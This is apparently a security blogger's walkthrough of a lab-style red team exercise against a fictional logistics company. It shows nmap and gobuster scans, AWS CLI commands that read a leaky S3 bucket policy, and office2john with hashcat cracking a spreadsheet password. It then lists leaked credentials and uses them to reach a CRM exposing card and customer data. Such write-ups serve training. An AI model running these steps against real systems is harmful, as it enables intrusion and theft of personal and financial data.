Exploit Weak Bucket Policies for Privileged Access
文章描述了一次针对Huge Logistics的红队测试。通过发现公共IP和AWS凭证,攻击者扫描并渗透了Node.js应用和S3存储桶。下载并破解备份文件后,获取了WebCRM等系统的登录信息。进一步枚举网站发现了隐藏的CRM页面,并成功访问了敏感客户数据和信用卡信息。 2026-1-12 13:26:27 Author: infosecwriteups.com(查看原文) 阅读量:0 收藏

Reju Kole

Press enter or click to view image in full size

Picture By Sora | AWS

Scenario

During an approved red team test for Huge Logistics, our team found a public IP address, 13.43.144.61, and AWS login details stored directly in a shipping application. The goal of this task is to use this information to explore their cloud setup further and show the possible impact by reaching sensitive data.

Enumeration

Let’s begin with an Nmap scan.

The scan shows a Node.js application running on its default port. It also indicates that the app is hosted on an EC2 instance located in the eu-west-2 region.

 nmap -Pn -sC -sV -A --top-ports=1000 13.43.144.61

Press enter or click to view image in full size

Nmap Scan

The Nmap scan shows that the target system is online and reachable. Almost all ports are filtered, but port 3000 is open. This port is running a web application built with the Node.js Express framework. When accessing it, the page title shows “Huge Logistics > Home,” which confirms it is the main application.

The server appears to be running on a Linux system and is hosted on an AWS EC2 instance in the eu-west-2 region. The operating system version could not be identified with full confidence, but it looks like a Linux 4.x based system. Overall, this tells us there is a single exposed web service on port 3000 that is likely the main entry point for further testing.

Opening the IP address in a web browser loads the Huge Logistics homepage.

http://13.43.144.61:3000/

Press enter or click to view image in full size

Huge Logistics

The site includes a login page, but trying common usernames and passwords does not work. There also does not appear to be any other features that stand out as easy to exploit. At this point, the next step is to review the website’s source code for anything useful.

http://13.43.144.61:3000/login?

Press enter or click to view image in full size

Login Page
 <header class="main-header">
<section class="container main-hero-container">
<div class="row">
<div class="col-12 col-lg-6">
<h1 class="Heading display-5 align-items-center">
Huge Logistics
</h1>
<img src="https://hugelogistics-data.s3.eu-west-2.amazonaws.com/truck.png" class="truckimg" alt="" srcset="">
<h2 class="sub-Heading">Everyday Anytime Anywhere</h2>
<p class="main-hero-para">
Your Ultimate Logistics Partner. With a focus on precision and efficiency,
we redefine supply chain management. Seamlessly connecting your shipments across distances,
our advanced solutions ensure your cargo's safe and timely arrival.
Our technology-driven approach empowers you with real-time tracking.

Press enter or click to view image in full size

This shows that the site is loading static files from an S3 bucket called hugelogistics-data.

AWS Configure

Next, we set up the AWS credentials using aws configure.

aws configure

Press enter or click to view image in full size

Configured Successfully

I try to list the contents of the S3 bucket, but it is not successful. The first command checks whether any authenticated AWS user has permission to access the bucket. The second command checks whether the bucket allows public access. Since I am using AWS CLI v2, all requests are signed by default. To test public access, I use the --no-sign-request option, which sends the request without credentials. This assumes that permissions are not already set for my specific user.

aws s3 ls hugelogistics-data
aws s3 ls hugelogistics-data --no-sign-request

Press enter or click to view image in full size

aws s3api get-bucket-acl --bucket hugelogistics-data

Press enter or click to view image in full size

I might try to download all the files from the bucket using aws s3 cp s3://hugelogistics-data . --recursive, but this also fails because the command first tries to list the bucket to see which files are available to download.

I move on and check for other permissions.

It is worth checking whether I can view the S3 bucket ACL, also known as the Access Control List. Bucket ACLs are an older and simpler permission system compared to bucket policies. They are used to grant read or write access to the bucket or the objects inside it to predefined Amazon S3 groups.

I run the command to get the bucket policy, and it returns the full JSON policy, but it is all in a single line and hard to read. To make it more readable, I can format it with tools like jq or other JSON formatters.

aws s3api get-bucket-policy --bucket hugelogistics-dat

Press enter or click to view image in full size

I do not have permission to list the bucket ACL. Instead, I check whether I can view the bucket policy. Bucket policies are attached directly to the bucket and specify which actions are allowed or denied for which users or roles.

Success! I am able to retrieve the bucket policy, but to make it easier to read, I can format it using the following command.

aws s3api get-bucket-policy --bucket hugelogistics-data | jq -r '.Policy' | sed 's/\\//g' | jq

Press enter or click to view image in full size

I retrieve the bucket policy for hugelogistics-data and see that it allows some interesting access. The policy shows two main statements:

  1. Public read access for certain objects, Any AWS user ("AWS": "*") is allowed to read the objects backup.xlsx and background.png, and also view their ACLs.
  2. Permission to get the bucket policy, Any AWS user is allowed to view the bucket policy itself.

This means that even without full access, I can read specific files and see the bucket’s policy.

Even though I cannot list the bucket contents, I am still able to access specific files and leak their data. The next step is to download the Excel file to my local system.

 aws s3 cp s3://hugelogistics-data/backup.xlsx .

Press enter or click to view image in full size

When I try to open the file in LibreOffice or Microsoft Office, it asks for a password. The next step is to see if I can crack that password.

First, I download the Python script called office2john.py.

 wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py

Press enter or click to view image in full size

This script takes a Microsoft Office file as input and converts it into a hash that matches the version of the Office document.

Different Office versions use different encryption methods, so tools like hashcat need the correct mode to crack them. Office 2007 uses SHA 1 with AES 128. Office 2010 moved to SHA 512 with AES 128 or AES 256. Office 2013 and newer versions improved security even more by using SHA 512 with AES 256 by default. They also add a random salt and increase the number of hashing rounds. Because of this, cracking passwords from newer Office files takes much more time and computing power.

I run the command below to generate a hash of the document so it can be used for an offline brute force attack.

 python3 office2john.py backup.xlsx > backup_hash.txt

Press enter or click to view image in full size

The generated hash is already in a format that John the Ripper can use, but it needs a small modification to work with hashcat. From the output, I can also see that the Excel file was automatically detected as an Office 2013 or newer version.

Get Reju Kole’s stories in your inbox

Join Medium for free to get updates from this writer.

Remove the filename backup.xlsx: from the hash and save it.

Press enter or click to view image in full size

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Press enter or click to view image in full size

I run the command below and successfully crack the spreadsheet password in less than two minutes.

hashcat -a 0 -m 9600 backup_hash.txt rockyou.txt

Press enter or click to view image in full size

Cracked: summertime

Press enter or click to view image in full size

backup.xlsx
Username Password System
[email protected] 5w8=U5taN]V7 WebCRM
[email protected] {&6Um-aC5@9 HR portal
mflear Michelle123! Email
mflear Password01! Cisco VPN
admin Admin1234 Redshift
michellef HugeLogistics2023 ADP
michellef DataEngineer123 Azure
[email protected] MichelleFleur! Slack
mflear 12345678ABC! Harvest
michellef Password01! SharePoint
[email protected] Welcome01! JIRA
admin admin MongoDB Atlas

At this point, the website is the only attack surface available, so I continue enumerating it to see if there are any other files or directories hosted on it. For this, I use Gobuster. If it is not already installed, it can be installed using the following command.

apt install gobuster

Next, I use a small Dirbuster wordlist to fuzz the server and check for hidden files or directories.

 wget https://raw.githubusercontent.com/daviddias/node-dirbuster/master/lists/directory-list-lowercase-2.3-medium.txt  

Press enter or click to view image in full size

gobuster dir -u http://13.43.144.61:3000/ -w directory-list-lowercase-2.3-medium.txt

Running Gobuster reveals a directory called /crm that I have not seen before. I open it in the browser to see what it contains.

Press enter or click to view image in full size

This leads to another login page. Remembering the WebCRM credentials found in the spreadsheet, I try them here, and the login works successfully.

http://13.43.144.61:3000/crm

Press enter or click to view image in full size

Admin / CRM System
[email protected] 5w8=U5taN]V7 WebCRM

Press enter or click to view image in full size

After logging in, I see a dashboard with options to manage shipments, users, and invoices.

http://13.43.144.61:3000/dashboard

Press enter or click to view image in full size

After logging in, I am presented with a page that allows me to manage shipments, users, and invoices.

When I click View Invoices Status, a page loads showing users’ credit card details. This clearly demonstrates sensitive data exposure and confirms full impact.

http://13.43.144.61:3000/invoices

Press enter or click to view image in full size

Press enter or click to view image in full size

Pwned!

By clicking on Export Data, I am able to download the full customer dataset.

Press enter or click to view image in full size

full customer dataset

Attack Path Visualization

  1. Discovered a public IP address and hardcoded AWS credentials in the shipping application
  2. Scanned the IP and identified a Node.js web application running on port 3000
  3. Visited the website and reviewed the source code
  4. Found references to an S3 bucket named hugelogistics-data
  5. Configured AWS credentials and checked S3 permissions
  6. Retrieved the bucket policy and identified readable objects
  7. Downloaded a protected Excel backup file from the S3 bucket
  8. Cracked the Excel password using an offline attack
  9. Extracted valid WebCRM login credentials from the spreadsheet
  10. Enumerated the website and discovered the hidden /crm directory
  11. Logged into the CRM using leaked credentials
  12. Gained access to shipment, user, and invoice management
  13. Viewed exposed credit card information
  14. Used the export feature to download full customer data

Impact: Full compromise of sensitive customer and financial data.

I hope you enjoyed this writeup! Happy Hacking :)

Subscribe to me on Medium and be sure to turn on email notifications so you never miss out on my latest walkthroughs, write-ups, and other informative posts.

Follow me on below Social Media:

  1. LinkedIn: Reju Kole

2. Instagram: reju.kole.9

3. Check My TryHackMe Profile : TryHackMe | W40X

4. Twitter | X : @Mr_W40X

5. GitHub : W40X | Reju Kole | Security Researcher

In case you need any help feel free to message me on my social media handles.


文章来源: https://infosecwriteups.com/exploit-weak-bucket-policies-for-privileged-access-54ccf5ecb5a9?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh